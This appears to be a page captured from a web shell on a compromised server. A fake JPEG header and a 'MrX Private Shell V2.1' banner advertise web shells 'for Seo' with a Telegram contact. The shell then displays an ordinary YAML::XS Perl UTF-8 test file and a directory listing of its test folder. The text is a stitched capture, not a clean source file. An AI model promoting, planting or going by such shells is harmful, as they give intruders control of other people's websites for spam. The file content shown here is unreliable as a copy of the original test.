����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
use strict;
use warnings;
use Test::More;
use YAML::XS ();
use Devel::Peek;
use Encode;
my $xs = YAML::XS->new( indent => 8, utf8 => 0 );
my $xsu = YAML::XS->new( indent => 8, utf8 => 1 );
my $v = "_ö_";
my $vd = decode_utf8 $v;
my ($yaml, $data);
note "=================================================== YAML::XS utf8: 0";
$yaml = $vd;
$ENV{TEST_VERBOSE} and Dump $yaml;
$data = $xs->load($yaml);
$ENV{TEST_VERBOSE} and Dump $data;
is $data, $vd, "load utf8 => 0";
$yaml = $xs->dump($data);
is $yaml, "--- $vd\n", "dump utf8 => 0";;
$ENV{TEST_VERBOSE} and Dump $yaml;
note "---> $yaml";
note "=================================================== YAML::XS utf8: 1";
$yaml = "_ö_";
$ENV{TEST_VERBOSE} and Dump $yaml;
$data = $xsu->load($yaml);
$ENV{TEST_VERBOSE} and Dump $data;
is $data, $vd, "load utf9 => 1";
$yaml = $xsu->dump($data);
$ENV{TEST_VERBOSE} and Dump $yaml;
is $yaml, "--- $v\n", "dump utf8 => 1";;
note "---> $yaml";
{
my ($json, $data);
note "=================================================== YAML::XS Load/Dump";
$data = YAML::XS::Load($v);
$ENV{TEST_VERBOSE} and Dump $data;
$yaml = YAML::XS::Dump($data);
$ENV{TEST_VERBOSE} and Dump $yaml;
}
if (require JSON::PP) {
my $j = JSON::PP->new;
my $ju = JSON::PP->new->utf8;
my ($json, $data);
note "=================================================== JSON::PP utf8: 0";
$json = decode_utf8 '["_ö_"]';
$data = $j->decode($json);
$ENV{TEST_VERBOSE} and Dump $data->[0];
$json = $j->encode($data);
$ENV{TEST_VERBOSE} and Dump $json;
note "=================================================== JSON::PP utf8: 1";
$json = '["_ö_"]';
$data = $ju->decode($json);
$ENV{TEST_VERBOSE} and Dump $data->[0];
$json = $ju->encode($data);
$ENV{TEST_VERBOSE} and Dump $json;
}
done_testing;
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 10-basic.t | File | 1.48 KB | 0644 |
|
| 11-schema.t | File | 4.7 KB | 0644 |
|
| 12-alias.t | File | 1.36 KB | 0644 |
|
| 13-utf8.t | File | 1.79 KB | 0644 |
|
| 14-options.pl | File | 3.25 KB | 0644 |
|
| schema-core.yaml | File | 10.31 KB | 0644 |
|